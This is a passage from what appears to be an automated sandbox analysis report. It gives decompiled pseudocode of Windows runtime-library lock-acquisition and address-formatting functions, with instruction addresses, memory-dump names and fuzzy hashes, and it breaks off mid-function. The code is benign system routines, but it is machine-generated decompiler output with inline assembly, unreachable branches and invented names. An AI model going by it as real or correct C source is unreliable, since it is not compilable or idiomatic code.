                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00980554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E00980554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a201c0;
									_push(_t144);
									_push(0);
									_t51 = E0093F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00984FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00993F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00993F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E009C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00993F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00983915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a201c0;
												_push(_t138);
												_push(0);
												_t58 = E0093F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00984FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00993F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00993F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E009C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00993F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00983915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00965384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0093F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00983915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0093F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00983915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0093F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00983915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00965329(_t110, _t138);
																_t69 = E009653A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                              0x0098055a
                                                                                                                                                              0x0098055d
                                                                                                                                                              0x00980563
                                                                                                                                                              0x00980566
                                                                                                                                                              0x009805d8
                                                                                                                                                              0x009805e2
                                                                                                                                                              0x009805e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009805e7
                                                                                                                                                              0x009805e7
                                                                                                                                                              0x009805ea
                                                                                                                                                              0x009805f3
                                                                                                                                                              0x009805f3
                                                                                                                                                              0x00980568
                                                                                                                                                              0x00980568
                                                                                                                                                              0x00980568
                                                                                                                                                              0x00980569
                                                                                                                                                              0x00980569
                                                                                                                                                              0x00980569
                                                                                                                                                              0x0098056b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a217f
                                                                                                                                                              0x009a2183
                                                                                                                                                              0x009a225b
                                                                                                                                                              0x009a225f
                                                                                                                                                              0x009a2189
                                                                                                                                                              0x009a218c
                                                                                                                                                              0x009a218f
                                                                                                                                                              0x009a2194
                                                                                                                                                              0x009a2199
                                                                                                                                                              0x009a219d
                                                                                                                                                              0x009a21a0
                                                                                                                                                              0x009a21a2
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21d0
                                                                                                                                                              0x009a21d6
                                                                                                                                                              0x009a21de
                                                                                                                                                              0x009a21e2
                                                                                                                                                              0x009a21e8
                                                                                                                                                              0x009a21e9
                                                                                                                                                              0x009a21ec
                                                                                                                                                              0x009a21f1
                                                                                                                                                              0x009a21f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21f8
                                                                                                                                                              0x009a21fb
                                                                                                                                                              0x009a2206
                                                                                                                                                              0x009a220b
                                                                                                                                                              0x009a220c
                                                                                                                                                              0x009a2217
                                                                                                                                                              0x009a2226
                                                                                                                                                              0x009a222b
                                                                                                                                                              0x009a222c
                                                                                                                                                              0x009a222f
                                                                                                                                                              0x009a2232
                                                                                                                                                              0x009a2235
                                                                                                                                                              0x009a2235
                                                                                                                                                              0x009a223a
                                                                                                                                                              0x009a223f
                                                                                                                                                              0x009a2241
                                                                                                                                                              0x009a2243
                                                                                                                                                              0x009a2248
                                                                                                                                                              0x009a2248
                                                                                                                                                              0x009a224d
                                                                                                                                                              0x009a224f
                                                                                                                                                              0x009a2262
                                                                                                                                                              0x009a2263
                                                                                                                                                              0x009a2268
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a2269
                                                                                                                                                              0x009a226d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2276
                                                                                                                                                              0x009a2279
                                                                                                                                                              0x009a227e
                                                                                                                                                              0x009a2283
                                                                                                                                                              0x009a2287
                                                                                                                                                              0x009a228a
                                                                                                                                                              0x009a228d
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22bc
                                                                                                                                                              0x009a22be
                                                                                                                                                              0x009a22c4
                                                                                                                                                              0x009a22cc
                                                                                                                                                              0x009a22d0
                                                                                                                                                              0x009a22d6
                                                                                                                                                              0x009a22d7
                                                                                                                                                              0x009a22da
                                                                                                                                                              0x009a22df
                                                                                                                                                              0x009a22e4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22e6
                                                                                                                                                              0x009a22e9
                                                                                                                                                              0x009a22f4
                                                                                                                                                              0x009a22f9
                                                                                                                                                              0x009a22fa
                                                                                                                                                              0x009a2305
                                                                                                                                                              0x009a2314
                                                                                                                                                              0x009a2319
                                                                                                                                                              0x009a231a
                                                                                                                                                              0x009a231d
                                                                                                                                                              0x009a2320
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2323
                                                                                                                                                              0x009a2328
                                                                                                                                                              0x009a232d
                                                                                                                                                              0x009a232f
                                                                                                                                                              0x009a2331
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a2336
                                                                                                                                                              0x009a233b
                                                                                                                                                              0x009a233d
                                                                                                                                                              0x009a2350
                                                                                                                                                              0x009a2351
                                                                                                                                                              0x009a2356
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a2359
                                                                                                                                                              0x009a235b
                                                                                                                                                              0x009a235d
                                                                                                                                                              0x00965367
                                                                                                                                                              0x0096536b
                                                                                                                                                              0x00965372
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2363
                                                                                                                                                              0x009a2369
                                                                                                                                                              0x009a236a
                                                                                                                                                              0x009a236c
                                                                                                                                                              0x009a2371
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a2379
                                                                                                                                                              0x009a237a
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a237f
                                                                                                                                                              0x009a2385
                                                                                                                                                              0x009a2386
                                                                                                                                                              0x009a2389
                                                                                                                                                              0x009a238e
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x00965378
                                                                                                                                                              0x0096537c
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2396
                                                                                                                                                              0x009a2397
                                                                                                                                                              0x009a239c
                                                                                                                                                              0x009a23a2
                                                                                                                                                              0x009a23a3
                                                                                                                                                              0x009a23a6
                                                                                                                                                              0x009a23ab
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b3
                                                                                                                                                              0x009a23b4
                                                                                                                                                              0x009a23b9
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23ba
                                                                                                                                                              0x009a23bc
                                                                                                                                                              0x009a23bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999153
                                                                                                                                                              0x00999158
                                                                                                                                                              0x0099915a
                                                                                                                                                              0x0099915e
                                                                                                                                                              0x00999160
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999166
                                                                                                                                                              0x00999171
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00999176
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00999160
                                                                                                                                                              0x009a23c6
                                                                                                                                                              0x009a23ce
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23d7
                                                                                                                                                              0x009a23ad
                                                                                                                                                              0x009a2390
                                                                                                                                                              0x009a2373
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a233f
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2291
                                                                                                                                                              0x009a2293
                                                                                                                                                              0x009a2295
                                                                                                                                                              0x009a229a
                                                                                                                                                              0x009a22a1
                                                                                                                                                              0x009a22a3
                                                                                                                                                              0x009a22a7
                                                                                                                                                              0x009a22a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22ab
                                                                                                                                                              0x009a22ad
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22af
                                                                                                                                                              0x009a22b1
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b4
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653be
                                                                                                                                                              0x009653c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653cb
                                                                                                                                                              0x009653ce
                                                                                                                                                              0x009653d0
                                                                                                                                                              0x009653d4
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653d8
                                                                                                                                                              0x009653e3
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x009653ea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009653d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a22b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a228f
                                                                                                                                                              0x009a2349
                                                                                                                                                              0x009a234d
                                                                                                                                                              0x009a2251
                                                                                                                                                              0x009a2251
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2251
                                                                                                                                                              0x009a21a4
                                                                                                                                                              0x009a21a4
                                                                                                                                                              0x009a21a6
                                                                                                                                                              0x009a21a8
                                                                                                                                                              0x009a21ac
                                                                                                                                                              0x009a21b6
                                                                                                                                                              0x009a21b8
                                                                                                                                                              0x009a21bc
                                                                                                                                                              0x009a21be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21c0
                                                                                                                                                              0x009a21c2
                                                                                                                                                              0x009a21c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21c4
                                                                                                                                                              0x009a21c6
                                                                                                                                                              0x009a21c6
                                                                                                                                                              0x009a21c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a21c8
                                                                                                                                                              0x009a21a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a2183
                                                                                                                                                              0x0098057b
                                                                                                                                                              0x0098057d
                                                                                                                                                              0x00980581
                                                                                                                                                              0x00980583
                                                                                                                                                              0x009a2178
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980589
                                                                                                                                                              0x0098058f
                                                                                                                                                              0x0098058f
                                                                                                                                                              0x00980583
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A2206
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                              • API String ID: 885266447-4236105082
                                                                                                                                                              • Opcode ID: 78d23f22b7f1a98c3c72a57986b9f9f01f4c09afbe79f77e2418958fa7dbf8fc
                                                                                                                                                              • Instruction ID: 2170f7e647c3736b47d8618dd20bb030bae5003de747b4489038c3f2b17f1aa6
                                                                                                                                                              • Opcode Fuzzy Hash: 78d23f22b7f1a98c3c72a57986b9f9f01f4c09afbe79f77e2418958fa7dbf8fc
                                                                                                                                                              • Instruction Fuzzy Hash: 99512631B042116BEF189F1CCC81F6673A9AFD5720F218229FD55DB285D921EC418BE0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E009814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa22088; // 0x7746be76
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00977707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00977707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00977707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00942340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0094E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                              0x009814c0
                                                                                                                                                              0x009814cb
                                                                                                                                                              0x009814d2
                                                                                                                                                              0x009814d6
                                                                                                                                                              0x009814da
                                                                                                                                                              0x009814de
                                                                                                                                                              0x009814e3
                                                                                                                                                              0x0098157a
                                                                                                                                                              0x0098157a
                                                                                                                                                              0x009814f1
                                                                                                                                                              0x009814f3
                                                                                                                                                              0x009aea0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aea15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aea15
                                                                                                                                                              0x009814f9
                                                                                                                                                              0x009814f9
                                                                                                                                                              0x009814fe
                                                                                                                                                              0x00981504
                                                                                                                                                              0x009aea1a
                                                                                                                                                              0x009aea1f
                                                                                                                                                              0x009aea21
                                                                                                                                                              0x009aea22
                                                                                                                                                              0x009aea27
                                                                                                                                                              0x009aea2a
                                                                                                                                                              0x009aea2a
                                                                                                                                                              0x00981515
                                                                                                                                                              0x00981517
                                                                                                                                                              0x0098156d
                                                                                                                                                              0x00981572
                                                                                                                                                              0x00981575
                                                                                                                                                              0x00981575
                                                                                                                                                              0x0098151e
                                                                                                                                                              0x009aea50
                                                                                                                                                              0x009aea55
                                                                                                                                                              0x009aea58
                                                                                                                                                              0x009aea58
                                                                                                                                                              0x0098152e
                                                                                                                                                              0x00981531
                                                                                                                                                              0x00981533
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00981535
                                                                                                                                                              0x00981541
                                                                                                                                                              0x00981549
                                                                                                                                                              0x00981549
                                                                                                                                                              0x00981533
                                                                                                                                                              0x009814f3
                                                                                                                                                              0x00981559

                                                                                                                                                              APIs
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 009AEA22
                                                                                                                                                                • Part of subcall function 009813CB: ___swprintf_l.LIBCMT ref: 0098146B
                                                                                                                                                                • Part of subcall function 009813CB: ___swprintf_l.LIBCMT ref: 00981490
                                                                                                                                                              • ___swprintf_l.LIBCMT ref: 0098156D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                                              • Opcode ID: dd0038cd4915145c2fac10d0072244fd84d8a925157a492593fe1f915872d077
                                                                                                                                                              • Instruction ID: 4394eb960096943c0751b72f9e361f7cefe659537d0dd6524dc1c34d8803a3ff
                                                                                                                                                              • Opcode Fuzzy Hash: dd0038cd4915145c2fac10d0072244fd84d8a925157a492593fe1f915872d077
                                                                                                                                                              • Instruction Fuzzy Hash: 1821A572900219ABCF21EE58CC41AEF73BCBB90700F444555FC46D3241DB749E598BE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E009653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a201c0;
									_push(_t92);
									_push(0);
									_t37 = E0093F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00984FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00993F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00993F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E009C217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00993F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00983915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00965384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0093F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00983915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0093F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
